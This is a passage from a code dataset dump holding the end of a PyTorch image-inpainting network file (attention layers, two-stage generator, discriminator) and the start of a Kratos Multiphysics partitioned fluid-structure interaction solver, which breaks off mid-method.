torch.bmm(proj_query, proj_key) # B, N, N\n\n mask = c.view(m_batchsize, -1, width * height) # B, C, N\n mask = mask.repeat(1, height * width, 1).permute(0, 2, 1) # B, 1, H, W -> B, C, H, W // B\n\n feature_pruning = feature_similarity * mask\n attention = self.softmax(feature_pruning) # B, N, C\n feature_pruning = torch.bmm(self.value_conv(a).view(m_batchsize, -1, width * height),\n attention.permute(0, 2, 1)) # -. B, C, N\n out = feature_pruning.view(m_batchsize, C, width, height) # B, C, H, W\n out = a * c + self.gamma * (1.0 - c) * out\n return out\n\n\nclass GlobalAttentionPatch(nn.Module):\n \"\"\" Self attention Layer\"\"\"\n\n def __init__(self, in_dim):\n super(GlobalAttentionPatch, self).__init__()\n self.chanel_in = in_dim\n\n self.query_channel = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.key_channel = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n self.value_channel = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\n\n self.softmax_channel = nn.Softmax(dim=-1)\n self.gamma = torch.tensor([1.0], requires_grad=True).cuda()\n\n def forward(self, x, y, m):\n '''\n Something\n '''\n feature_size = list(x.size())\n # Channel attention\n query_channel = self.query_channel(x).view(feature_size[0], -1, feature_size[2] * feature_size[3])\n key_channel = self.key_channel(y).view(feature_size[0], -1, feature_size[2] * feature_size[3]).permute(0,\n 2,\n 1)\n channel_correlation = torch.bmm(query_channel, key_channel)\n m_r = m.view(feature_size[0], -1, feature_size[2]*feature_size[3])\n channel_correlation = torch.bmm(channel_correlation, m_r)\n energy_channel = self.softmax_channel(channel_correlation)\n value_channel = self.value_channel(x).view(feature_size[0], -1, feature_size[2] * feature_size[3])\n attented_channel = (energy_channel * value_channel).view(feature_size[0], feature_size[1],\n feature_size[2],\n feature_size[3])\n out = x * m + self.gamma * (1.0 - m) * attented_channel\n return out\n\n\nif __name__ == '__main__':\n x = torch.rand(3, 128, 64, 64, requires_grad=True).float().cuda()\n y = torch.rand(3, 1, 256, 256, requires_grad=False).float().cuda()\n y[y > 0.5] = 1\n y[y <= 0.5] = 0\n net = GlobalLocalAttention(128).cuda()\n out = net(x, y)\n print(out.shape)\n\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.utils import spectral_norm as spectral_norm_fn\nfrom torch.nn.utils import weight_norm as weight_norm_fn\n#from model.Attention import GlobalLocalAttention, GlobalAttention\n\n\nclass Generator(nn.Module):\n def __init__(self, input_dim=5, ngf=32, use_cuda=True, device_ids=[0]):\n super(Generator, self).__init__()\n self.input_dim = input_dim\n self.cnum = ngf\n self.use_cuda = use_cuda\n self.device_ids = device_ids\n\n self.coarse_generator = CoarseGenerator(self.input_dim, self.cnum, self.use_cuda, self.device_ids)\n self.fine_generator = FineGenerator(self.input_dim, self.cnum, self.use_cuda, self.device_ids)\n\n def forward(self, x, mask):\n x_stage1 = self.coarse_generator(x, mask)\n x_stage2 = self.fine_generator(x, x_stage1, mask)\n #return x_stage1, x_stage2\n #return x_stage2\n return x_stage2, x_stage1\n\n\nclass CoarseGenerator(nn.Module):\n def __init__(self, input_dim, cnum, use_cuda=True, device_ids=None):\n super(CoarseGenerator, self).__init__()\n self.use_cuda = use_cuda\n self.device_ids = device_ids\n\n # 3 x 256 x 256\n self.conv1 = gen_conv(input_dim, cnum, 5, 1, 2)\n self.conv2_downsample = gen_conv(cnum, cnum, 3, 2, 1)\n # cnum*2 x 128 x 128\n self.conv3 = gen_conv(cnum, cnum * 2, 3, 1, 1)\n self.conv4_downsample = gen_conv(cnum * 2, cnum * 2, 3, 2, 1)\n # cnum*4 x 64 x 64\n self.conv5 = gen_conv(cnum * 2, cnum * 4, 3, 1, 1)\n self.conv6 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.conv7_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 2, rate=2)\n self.conv8_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 4, rate=4)\n self.conv9_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 8, rate=8)\n self.conv10_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 16, rate=16)\n # attention branch\n # 3 x 256 x 256\n self.pmconv1 = gen_conv(input_dim, cnum, 5, 1, 2)\n self.pmconv2_downsample = gen_conv(cnum, cnum, 3, 2, 1)\n # cnum*2 x 128 x 128\n self.pmconv3 = gen_conv(cnum, cnum * 2, 3, 1, 1)\n self.pmconv4_downsample = gen_conv(cnum * 2, cnum * 4, 3, 2, 1)\n # cnum*4 x 64 x 64\n self.pmconv5 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.pmconv6 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1, activation='relu')\n self.contextul_attention = GlobalAttention(in_dim=128)\n self.pmconv9 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.pmconv10 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.allconv11 = gen_conv(cnum * 8, cnum * 4, 3, 1, 1)\n self.allconv12 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.allconv13 = gen_conv(cnum * 4, cnum * 2, 3, 1, 1)\n self.allconv14 = gen_conv(cnum * 2, cnum * 2, 3, 1, 1)\n self.allconv15 = gen_conv(cnum * 2, cnum, 3, 1, 1)\n self.allconv16 = gen_conv(cnum, cnum // 2, 3, 1, 1)\n self.allconv17 = gen_conv(cnum // 2, 3, 3, 1, 1, activation='none')\n\n def forward(self, xin, mask):\n # For indicating the boundaries of images\n ones = torch.ones(xin.size(0), 1, xin.size(2), xin.size(3))\n if self.use_cuda:\n ones = ones.cuda()\n mask = mask.cuda()\n # conv branch\n xnow = torch.cat([xin, ones, mask], dim=1)\n x = self.conv1(xnow)\n x = self.conv2_downsample(x)\n x = self.conv3(x)\n x = self.conv4_downsample(x)\n x = self.conv5(x)\n x = self.conv6(x)\n x = self.conv7_atrous(x)\n x = self.conv8_atrous(x)\n x = self.conv9_atrous(x)\n x = self.conv10_atrous(x)\n x_hallu = x\n # attention branch\n x = self.pmconv1(xnow)\n x = self.pmconv2_downsample(x)\n x = self.pmconv3(x)\n x = self.pmconv4_downsample(x)\n x = self.pmconv5(x)\n x = self.pmconv6(x)\n x = self.contextul_attention(x, x, mask)\n x = self.pmconv9(x)\n x = self.pmconv10(x)\n pm = x\n x = torch.cat([x_hallu, pm], dim=1)\n # merge two branches\n x = self.allconv11(x)\n x = self.allconv12(x)\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n x = self.allconv13(x)\n x = self.allconv14(x)\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n x = self.allconv15(x)\n x = self.allconv16(x)\n x = self.allconv17(x)\n x_stage1 = torch.clamp(x, -1., 1.)\n\n return x_stage1\n\n\n\nclass FineGenerator(nn.Module):\n def __init__(self, input_dim, cnum, use_cuda=True, device_ids=None):\n super(FineGenerator, self).__init__()\n self.use_cuda = use_cuda\n self.device_ids = device_ids\n\n # 3 x 256 x 256\n self.conv1 = gen_conv(input_dim, cnum, 5, 1, 2)\n self.conv2_downsample = gen_conv(cnum, cnum, 3, 2, 1)\n # cnum*2 x 128 x 128\n self.conv3 = gen_conv(cnum, cnum * 2, 3, 1, 1)\n self.conv4_downsample = gen_conv(cnum * 2, cnum * 2, 3, 2, 1)\n # cnum*4 x 64 x 64\n\n self.conv5 = gen_conv(cnum * 2, cnum * 4, 3, 1, 1)\n self.conv6 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n\n self.conv7_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 2, rate=2)\n self.conv8_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 4, rate=4)\n self.conv9_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 8, rate=8)\n self.conv10_atrous = gen_conv(cnum * 4, cnum * 4, 3, 1, 16, rate=16)\n\n # attention branch\n # 3 x 256 x 256\n self.pmconv1 = gen_conv(input_dim, cnum, 5, 1, 2)\n self.pmconv2_downsample = gen_conv(cnum, cnum, 3, 2, 1)\n # cnum*2 x 128 x 128\n self.pmconv3 = gen_conv(cnum, cnum * 2, 3, 1, 1)\n self.pmconv4_downsample = gen_conv(cnum * 2, cnum * 4, 3, 2, 1)\n # cnum*4 x 64 x 64\n self.pmconv5 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.pmconv6 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1, activation='relu')\n self.contextul_attention = GlobalLocalAttention(in_dim=128)\n self.pmconv9 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n self.pmconv10 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n\n self.allconv11 = gen_conv(cnum * 8, cnum * 4, 3, 1, 1)\n self.allconv12 = gen_conv(cnum * 4, cnum * 4, 3, 1, 1)\n\n self.allconv13 = gen_conv(cnum * 4, cnum * 2, 3, 1, 1)\n self.allconv14 = gen_conv(cnum * 2, cnum * 2, 3, 1, 1)\n self.allconv15 = gen_conv(cnum * 2, cnum, 3, 1, 1)\n self.allconv16 = gen_conv(cnum, cnum // 2, 3, 1, 1)\n\n self.allconv17 = gen_conv(cnum // 2, 3, 3, 1, 1, activation='none')\n\n def forward(self, xin, x_stage1, mask):\n x1_inpaint = x_stage1 * mask + xin * (1. - mask)\n # For indicating the boundaries of images\n ones = torch.ones(xin.size(0), 1, xin.size(2), xin.size(3))\n if self.use_cuda:\n ones = ones.cuda()\n mask = mask.cuda()\n # conv branch\n xnow = torch.cat([x1_inpaint, ones, mask], dim=1)\n x = self.conv1(xnow)\n x = self.conv2_downsample(x)\n x = self.conv3(x)\n x = self.conv4_downsample(x)\n x = self.conv5(x)\n x = self.conv6(x)\n x = self.conv7_atrous(x)\n x = self.conv8_atrous(x)\n x = self.conv9_atrous(x)\n x = self.conv10_atrous(x)\n x_hallu = x\n # attention branch\n x = self.pmconv1(xnow)\n x = self.pmconv2_downsample(x)\n x = self.pmconv3(x)\n x = self.pmconv4_downsample(x)\n x = self.pmconv5(x)\n x = self.pmconv6(x)\n x = self.contextul_attention(x,mask)\n x = self.pmconv9(x)\n x = self.pmconv10(x)\n pm = x\n x = torch.cat([x_hallu, pm], dim=1)\n # merge two branches\n x = self.allconv11(x)\n x = self.allconv12(x)\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n x = self.allconv13(x)\n x = self.allconv14(x)\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n x = self.allconv15(x)\n x = self.allconv16(x)\n x = self.allconv17(x)\n x_stage2 = torch.clamp(x, -1., 1.)\n\n return x_stage2\n\nclass GlobalDis(nn.Module):\n def __init__(self, config, use_cuda=True, device_ids=None):\n super(GlobalDis, self).__init__()\n self.input_dim = config['input_dim']\n self.cnum = config['ndf']\n self.use_cuda = use_cuda\n self.device_ids = device_ids\n\n self.dis_conv_module = DisConvModule(self.input_dim, self.cnum)\n # self.linear = nn.Linear(self.cnum * 4 * 8 * 8, 1)\n # self.dropout = nn.Dropout(p=0.2)\n\n def forward(self, x):\n x = self.dis_conv_module(x)\n # x = self.dropout(x)\n # x = x.view(x.size()[0], -1)\n # x = self.linear(x)\n\n return x\n\nclass DisConvModule(nn.Module):\n def __init__(self, input_dim, cnum, use_cuda=True, device_ids=None):\n super(DisConvModule, self).__init__()\n self.use_cuda = use_cuda\n self.device_ids = device_ids\n\n self.conv1 = dis_conv(input_dim, cnum, 5, 2, 2)\n self.conv2 = dis_conv(cnum, cnum * 2, 5, 2, 2)\n self.conv3 = dis_conv(cnum * 2, cnum * 4, 5, 2, 2)\n self.conv4 = dis_conv(cnum * 4, cnum * 4, 5, 2, 2)\n self.conv5 = dis_conv(cnum * 4, cnum * 4, 5, 2, 2)\n\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n\n\n return x\n\n\ndef gen_conv(input_dim, output_dim, kernel_size=3, stride=1, padding=0, rate=1,\n activation='elu'):\n return Conv2dBlock(input_dim, output_dim, kernel_size, stride,\n conv_padding=padding, dilation=rate,\n activation=activation)\n\n\ndef dis_conv(input_dim, output_dim, kernel_size=5, stride=2, padding=0, rate=1,\n activation='lrelu'):\n return Conv2dBlock(input_dim, output_dim, kernel_size, stride,\n conv_padding=padding, dilation=rate,\n activation=activation, weight_norm='sn')\n\n\nclass Conv2dBlock(nn.Module):\n def __init__(self, input_dim, output_dim, kernel_size, stride, padding=0,\n conv_padding=0, dilation=1, weight_norm='none', norm='none',\n activation='lrelu', pad_type='zeros', transpose=False):\n super(Conv2dBlock, self).__init__()\n self.use_bias = True\n # initialize padding\n if pad_type == 'reflect':\n self.pad = nn.ReflectionPad2d(padding)\n elif pad_type == 'replicate':\n self.pad = nn.ReplicationPad2d(padding)\n elif pad_type == 'zeros':\n self.pad = nn.ZeroPad2d(padding)\n elif pad_type == 'none':\n self.pad = None\n else:\n assert 0, \"Unsupported padding type: {}\".format(pad_type)\n\n # initialize normalization\n norm_dim = output_dim\n if norm == 'bn':\n self.norm = nn.BatchNorm2d(norm_dim)\n elif norm == 'in':\n self.norm = nn.InstanceNorm2d(norm_dim)\n elif norm == 'none':\n self.norm = None\n else:\n assert 0, \"Unsupported normalization: {}\".format(norm)\n\n if weight_norm == 'sn':\n self.weight_norm = spectral_norm_fn\n elif weight_norm == 'wn':\n self.weight_norm = weight_norm_fn\n elif weight_norm == 'none':\n self.weight_norm = None\n else:\n assert 0, \"Unsupported normalization: {}\".format(weight_norm)\n\n # initialize activation\n if activation == 'relu':\n self.activation = nn.ReLU(inplace=True)\n elif activation == 'elu':\n self.activation = nn.ELU(inplace=True)\n elif activation == 'lrelu':\n self.activation = nn.LeakyReLU(0.2, inplace=True)\n elif activation == 'prelu':\n self.activation = nn.PReLU()\n elif activation == 'selu':\n self.activation = nn.SELU(inplace=True)\n elif activation == 'tanh':\n self.activation = nn.Tanh()\n elif activation == 'none':\n self.activation = None\n else:\n assert 0, \"Unsupported activation: {}\".format(activation)\n\n # initialize convolution\n if transpose:\n self.conv = nn.ConvTranspose2d(input_dim, output_dim,\n kernel_size, stride,\n padding=conv_padding,\n output_padding=conv_padding,\n dilation=dilation,\n bias=self.use_bias)\n\n else:\n self.conv = nn.Conv2d(input_dim, output_dim, kernel_size, stride,\n padding=conv_padding, dilation=dilation,\n bias=self.use_bias, padding_mode=pad_type)\n\n if self.weight_norm:\n self.conv = self.weight_norm(self.conv)\n\n def forward(self, x):\n if self.pad:\n x = self.conv(self.pad(x))\n else:\n x = self.conv(x)\n if self.norm:\n x = self.norm(x)\n if self.activation:\n x = self.activation(x)\n return x\n","sub_path":"codes/models/modules/architectures/Global_arch.py","file_name":"Global_arch.py","file_ext":"py","file_size_in_byte":25227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"4214873","text":"from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7\nfrom math import sqrt # Import the square root from python library\n\n# Import utilities\nfrom KratosMultiphysics.FSIApplication import NonConformant_OneSideMap # Import non-conformant mapper\nfrom KratosMultiphysics.FluidDynamicsApplication import python_solvers_wrapper_fluid # Import the fluid Python solvers wrapper\nfrom KratosMultiphysics.StructuralMechanicsApplication import python_solvers_wrapper_structural # Import the structure Python solvers wrapper\nfrom KratosMultiphysics.MeshMovingApplication import python_solvers_wrapper_mesh_motion # Import the mesh motion Python solvers wrapper\nfrom KratosMultiphysics.FSIApplication import convergence_accelerator_factory # Import the FSI convergence accelerator factory\n\n# Importing the Kratos Library\nimport KratosMultiphysics\nfrom KratosMultiphysics.python_solver import PythonSolver\n\n# Import applications\nimport KratosMultiphysics.FSIApplication as KratosFSI\nimport KratosMultiphysics.StructuralMechanicsApplication as KratosStructural\n\ndef CreateSolver(model, project_parameters):\n return PartitionedFSIBaseSolver(model, project_parameters)\n\nclass PartitionedFSIBaseSolver(PythonSolver):\n\n def _ValidateSettings(self, project_parameters):\n default_settings = KratosMultiphysics.Parameters(\"\"\"\n {\n \"echo_level\": 0,\n \"parallel_type\": \"OpenMP\",\n \"solver_type\": \"partitioned\",\n \"coupling_scheme\": \"dirichlet_neumann\",\n \"structure_solver_settings\": {\n },\n \"fluid_solver_settings\":{\n },\n \"mesh_solver_settings\":{\n },\n \"coupling_settings\":{\n }\n }\"\"\")\n\n project_parameters.ValidateAndAssignDefaults(default_settings)\n\n if not project_parameters[\"structure_solver_settings\"].Has(\"multi_point_constraints_used\"):\n project_parameters[\"structure_solver_settings\"].AddEmptyValue(\"multi_point_constraints_used\")\n project_parameters[\"structure_solver_settings\"][\"multi_point_constraints_used\"].SetBool(False)\n\n return project_parameters\n\n def __init__(self, model, project_parameters):\n\n # Validate settings\n project_parameters = self._ValidateSettings(project_parameters)\n\n # Call the base Python solver constructor\n super(PartitionedFSIBaseSolver,self).__init__(model, project_parameters)\n\n # Auxiliar variables\n self.parallel_type = self.settings[\"parallel_type\"].GetString()\n coupling_settings = self.settings[\"coupling_settings\"]\n self.max_nl_it = coupling_settings[\"nl_max_it\"].GetInt()\n self.nl_tol = coupling_settings[\"nl_tol\"].GetDouble()\n self.solve_mesh_at_each_iteration = coupling_settings[\"solve_mesh_at_each_iteration\"].GetBool()\n self.fluid_interface_submodelpart_name = coupling_settings[\"fluid_interfaces_list\"][0].GetString()\n self.structure_interface_submodelpart_name = coupling_settings[\"structure_interfaces_list\"][0].GetString()\n\n # Construct the structure solver\n self.structure_solver = python_solvers_wrapper_structural.CreateSolverByParameters(self.model, self.settings[\"structure_solver_settings\"], self.parallel_type)\n self._PrintInfoOnRankZero(\"::[PartitionedFSIBaseSolver]::\", \"Structure solver construction finished.\")\n\n # Construct the fluid solver\n self.fluid_solver = python_solvers_wrapper_fluid.CreateSolverByParameters(self.model, self.settings[\"fluid_solver_settings\"], self.parallel_type)\n self._PrintInfoOnRankZero(\"::[PartitionedFSIBaseSolver]::\", \"Fluid solver construction finished.\")\n\n # Construct the ALE mesh solver\n self.mesh_solver = python_solvers_wrapper_mesh_motion.CreateSolverByParameters(self.model, self.settings[\"mesh_solver_settings\"], self.parallel_type)\n self._PrintInfoOnRankZero(\"::[PartitionedFSIBaseSolver]::\", \"ALE mesh solver construction finished.\")\n self._PrintInfoOnRankZero(\"::[PartitionedFSIBaseSolver]::\", \"Partitioned FSI base solver construction finished.\")\n\n def GetMinimumBufferSize(self):\n # Get structure buffer size\n buffer_structure = self.structure_solver.GetMinimumBufferSize()\n # Get fluid buffer size\n buffer_fluid = self.fluid_solver.GetMinimumBufferSize()\n\n return max(buffer_structure,buffer_fluid)\n\n def AddVariables(self):\n ## Structure variables addition\n # Standard CSM variables addition\n self.structure_solver.AddVariables()\n\n ## Fluid variables addition\n # Standard CFD variables addition\n self.fluid_solver.AddVariables()\n self.fluid_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.FORCE)\n self.fluid_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.MESH_ACCELERATION) # TODO: This should be added in the mesh solvers\n # Mesh solver variables addition\n self.mesh_solver.AddVariables()\n\n ## FSIApplication variables addition\n NonConformant_OneSideMap.AddVariables(self.fluid_solver.main_model_part,self.structure_solver.main_model_part)\n self.fluid_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VECTOR_PROJECTED)\n self.fluid_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.FSI_INTERFACE_RESIDUAL)\n self.fluid_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.FSI_INTERFACE_MESH_RESIDUAL)\n self.structure_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.POSITIVE_MAPPED_VECTOR_VARIABLE)\n self.structure_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.NEGATIVE_MAPPED_VECTOR_VARIABLE)\n self.structure_solver.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VECTOR_PROJECTED)\n\n def ImportModelPart(self):\n # Fluid and structure solvers ImportModelPart() call\n self.fluid_solver.ImportModelPart()\n self.structure_solver.ImportModelPart()\n\n def PrepareModelPart(self):\n # Get the minimum buffer size between the mesh, fluid and structure solvers\n self._GetAndSetMinimumBufferSize()\n # Fluid and structure solvers PrepareModelPart() call\n self.structure_solver.PrepareModelPart()\n self.fluid_solver.PrepareModelPart()\n self.mesh_solver.PrepareModelPart()\n\n def AddDofs(self):\n # Add DOFs structure\n self.structure_solver.AddDofs()\n\n # Add DOFs fluid\n self.fluid_solver.AddDofs()\n self.mesh_solver.AddDofs()\n\n def Initialize(self):\n err_msg = 'Calling the base partitioned FSI solver Initialize() method.\\n'\n err_msg += 'Implement the custom Initialize() method in the derived solver.'\n raise Exception(err_msg)\n\n def AdvanceInTime(self, current_time):\n fluid_new_time = self.fluid_solver.AdvanceInTime(current_time)\n structure_new_time = self.structure_solver.AdvanceInTime(current_time)\n\n if abs(fluid_new_time - structure_new_time) > 1e-12:\n err_msg = 'Fluid new time is: ' + str(fluid_new_time) + '\\n'\n err_msg += 'Structure new time is: ' + str(structure_new_time) + '\\n'\n err_msg += 'No substepping has been implemented yet. Fluid and structure time must coincide.'\n raise Exception(err_msg)\n\n return fluid_new_time\n\n def InitializeSolutionStep(self):\n # Initialize solution step of fluid, structure and coupling solvers\n self.structure_solver.InitializeSolutionStep()\n self.fluid_solver.InitializeSolutionStep()\n self.mesh_solver.InitializeSolutionStep()\n self._GetConvergenceAccelerator().InitializeSolutionStep()\n\n def Predict(self):\n # Perform fluid and structure solvers predictions\n self.structure_solver.Predict()\n self.fluid_solver.Predict()\n self.mesh_solver.Predict()\n\n def GetComputingModelPart(self):\n err_msg = 'Calling GetComputingModelPart() method in a partitioned solver.\\n'\n err_msg += 'Specify the domain of interest by calling:\\n'\n err_msg += '\\t- GetFluidComputingModelPart()\\n'\n err_msg += '\\t- GetStructureComputingModelPart()\\n'\n raise Exception(err_msg)\n\n def GetFluidComputingModelPart(self):\n return self.fluid_solver.GetComputingModelPart()\n\n def GetStructureComputingModelPart(self):\n return self.structure_solver.GetComputingModelPart()\n\n def GetOutputVariables(self):\n pass\n\n def SaveRestart(self):\n pass\n\n def SolveSolutionStep(self):\n ## Solvers initialization\n self.InitializeSolutionStep()\n\n ## Solvers predict\n self.Predict()\n\n ## Compute mesh prediction ##\n if (self.double_faced_structure):\n self._ComputeMeshPredictionDoubleFaced()\n else:\n self._ComputeMeshPredictionSingleFaced()\n\n ## Non-Linear interface coupling iteration ##\n nl_it = 0\n is_converged = False\n while not is_converged:\n nl_it += 1\n self._PrintInfoOnRankZero(\"\",\"\\tFSI non-linear iteration = \", nl_it)\n\n self.fluid_solver.main_model_part.ProcessInfo[KratosMultiphysics.CONVERGENCE_ACCELERATOR_ITERATION] = nl_it\n self.structure_solver.main_model_part.ProcessInfo[KratosMultiphysics.CONVERGENCE_ACCELERATOR_ITERATION] = nl_it\n\n self._GetConvergenceAccelerator().InitializeNonLinearIteration()\n\n # Solve the mesh problem as well as the fluid problem\n self._SolveMeshAndFluid()\n\n # Solve the structure problem and computes the displacement residual\n if (self.double_faced_structure):\n self._SolveStructureDoubleFaced()\n dis_residual = self._ComputeDisplacementResidualDoubleFaced()\n else:\n self._SolveStructureSingleFaced()\n dis_residual = self._ComputeDisplacementResidualSingleFaced()\n\n # Residual computation\n nl_res_norm = self.fluid_solver.main_model_part.ProcessInfo[KratosMultiphysics.FSI_INTERFACE_RESIDUAL_NORM]\n interface_dofs = self.partitioned_fsi_utilities.GetInterfaceResidualSize(self._GetFluidInterfaceSubmodelPart())\n\n # Check convergence\n if nl_res_norm/sqrt(interface_dofs) < self.nl_tol:\n is_converged = True\n self._GetConvergenceAccelerator().FinalizeNonLinearIteration()\n self._PrintInfoOnRankZero(\"\",\"\\tNon-linear iteration convergence achieved\")\n self._PrintInfoOnRankZero(\"\",\"\\tTotal non-linear iterations: \", nl_it, \" |res|/sqrt(nDOFS) = \", nl_res_norm/sqrt(interface_dofs))\n break\n else:\n # If convergence is not achieved, perform the correction of the prediction\n self._PrintInfoOnRankZero(\"\",\"\\tResidual computation finished. |res|/sqrt(nDOFS) = \", nl_res_norm/sqrt(interface_dofs))\n self._GetConvergenceAccelerator().UpdateSolution(dis_residual, self.iteration_value)\n self._GetConvergenceAccelerator().FinalizeNonLinearIteration()\n\n if (nl_it == self.max_nl_it):\n self._PrintWarningOnRankZero(\"\",\"\\tFSI NON-LINEAR ITERATION CONVERGENCE NOT ACHIEVED\")\n break\n\n ## Compute the mesh residual as final testing (it is expected to be 0)\n mesh_res_norm = self.partitioned_fsi_utilities.ComputeInterfaceResidualNorm(\n self._GetFluidInterfaceSubmodelPart(),\n KratosMultiphysics.VELOCITY,\n KratosMultiphysics.MESH_VELOCITY,\n KratosMultiphysics.FSI_INTERFACE_MESH_RESIDUAL,\n \"nodal\")\n self._PrintInfoOnRankZero(\"\",\"\\tNL residual norm: \", nl_res_norm)\n self._PrintInfoOnRankZero(\"\",\"\\tMesh residual norm: \", mesh_res_norm)\n\n return is_converged\n\n def FinalizeSolutionStep(self):\n self.structure_solver.FinalizeSolutionStep()\n self.fluid_solver.FinalizeSolutionStep()\n self.mesh_solver.FinalizeSolutionStep()\n self._GetConvergenceAccelerator().FinalizeSolutionStep()\n\n def SetEchoLevel(self, structure_echo_level, fluid_echo_level):\n self.structure_solver.SetEchoLevel(self, structure_echo_level)\n self.fluid_solver.SetEchoLevel(self, fluid_echo_level)\n\n def SetTimeStep(self, step):\n self.fluid_solver.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.STEP, step)\n self.structure_solver.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.STEP, step)\n\n def Clear(self):\n self.fluid_solver.Clear()\n self.structure_solver.Clear()\n\n def Check(self):\n self.fluid_solver.Check()\n self.structure_solver.Check()\n\n #######################################################################\n ############## PRIVATE METHODS SECTION ##############\n #######################################################################\n\n # This method is to be overwritten in the MPI solver\n def _PrintInfoOnRankZero(self, *args):\n KratosMultiphysics.Logger.PrintInfo(\" \".join(map(str, args)))\n\n # This method is to be overwritten in the MPI solver\n def _PrintWarningOnRankZero(self, *args):\n KratosMultiphysics.Logger.PrintWarning(\" \".join(map(str, args)))\n\n # This method returns the convergence accelerator.\n # If it is not created yet, it calls the _CreateConvergenceAccelerator first\n def _GetConvergenceAccelerator(self):\n if not hasattr(self, '_convergence_accelerator'):\n self._convergence_accelerator = self._CreateConvergenceAccelerator()\n return self._convergence_accelerator\n\n # This method constructs the convergence accelerator coupling utility\n def _CreateConvergenceAccelerator(self):\n convergence_accelerator = convergence_accelerator_factory.CreateConvergenceAccelerator(self.settings[\"coupling_settings\"][\"coupling_strategy_settings\"])\n self._PrintInfoOnRankZero(\"::[PartitionedFSIBaseSolver]::\", \"Coupling strategy construction finished.\")\n return convergence_accelerator\n\n # This method finds the maximum buffer size between mesh,\n # fluid and structure solvers and sets it to all the solvers.\n def _GetAndSetMinimumBufferSize(self):\n fluid_buffer_size = self.fluid_solver.min_buffer_size\n mesh_buffer_size = self.mesh_solver.settings[\"buffer_size\"].GetInt()\n str_buffer_size = self.structure_solver.settings[\"buffer_size\"].GetInt()\n\n buffer_size = max(fluid_buffer_size, mesh_buffer_size)\n buffer_size = max(buffer_size, str_buffer_size)\n\n self.fluid_solver.min_buffer_size = buffer_size\n self.mesh_solver.settings[\"buffer_size\"].SetInt(buffer_size)\n self.structure_solver.settings[\"buffer_size\"].SetInt(buffer_size)\n\n def _GetFluidInterfaceSubmodelPart(self):\n # Returns the fluid interface submodelpart that will be used in the residual minimization\n return self.fluid_solver.main_model_part.GetSubModelPart(self.fluid_interface_submodelpart_name)\n\n def _GetFluidPositiveInterfaceSubmodelPart(self):\n mapper_settings = self.settings[\"coupling_settings\"][\"mapper_settings\"]\n\n # Get the fluid interface faces submodelpart names\n for mapper_id in range(2):\n if (mapper_settings[mapper_id][\"mapper_face\"].GetString() == \"Positive\"):\n pos_face_submodelpart_name = mapper_settings[mapper_id][\"fluid_interface_submodelpart_name\"].GetString()\n\n # Returns the fluid positive interface submodelpart\n return self.fluid_solver.main_model_part.GetSubModelPart(pos_face_submodelpart_name)\n\n def _GetFluidNegativeInterfaceSubmodelPart(self):\n mapper_settings = self.settings[\"coupling_settings\"][\"mapper_settings\"]\n\n # Get the fluid interface faces submodelpart names\n for mapper_id in range(2):\n if (mapper_settings[mapper_id][\"mapper_face\"].GetString() == \"Negative\"):\n neg_face_submodelpart_name = mapper_settings[mapper_id][\"fluid_interface_submodelpart_name\"].GetString()\n\n # Returns the fluid negative interface submodelpart\n return self.fluid_solver.main_model_part.GetSubModelPart(neg_face_submodelpart_name)\n\n def _GetStructureInterfaceSubmodelPart(self):\n # Returns the structure interface submodelpart that will be used in the residual minimization\n return self.structure_solver.main_model_part.GetSubModelPart(self.structure_interface_submodelpart_name)\n\n def _GetDomainSize(self):\n fluid_domain_size = self.fluid_solver.main_model_part.ProcessInfo[KratosMultiphysics.DOMAIN_SIZE]\n structure_domain_size = self.structure_solver.main_model_part.ProcessInfo[KratosMultiphysics.DOMAIN_SIZE]\n\n if fluid_domain_size !=structure_domain_size:\n raise(\"ERROR: Solid domain size and fluid domain size are not equal!\")\n\n return fluid_domain_size\n\n def _ComputeDeltaTime(self):\n fluid_time_step = self.fluid_solver._ComputeDeltaTime()\n structure_time_step = self.structure_solver.ComputeDeltaTime()\n\n if abs(fluid_time_step - structure_time_step) > 1e-12:\n err_msg = 'Fluid time step is: ' + str(fluid_time_step) + '\\n'\n err_msg += 'Structure time step is: ' + str(structure_time_step) + '\\n'\n err_msg += 'No substepping has been implemented yet. Fluid and structure time step 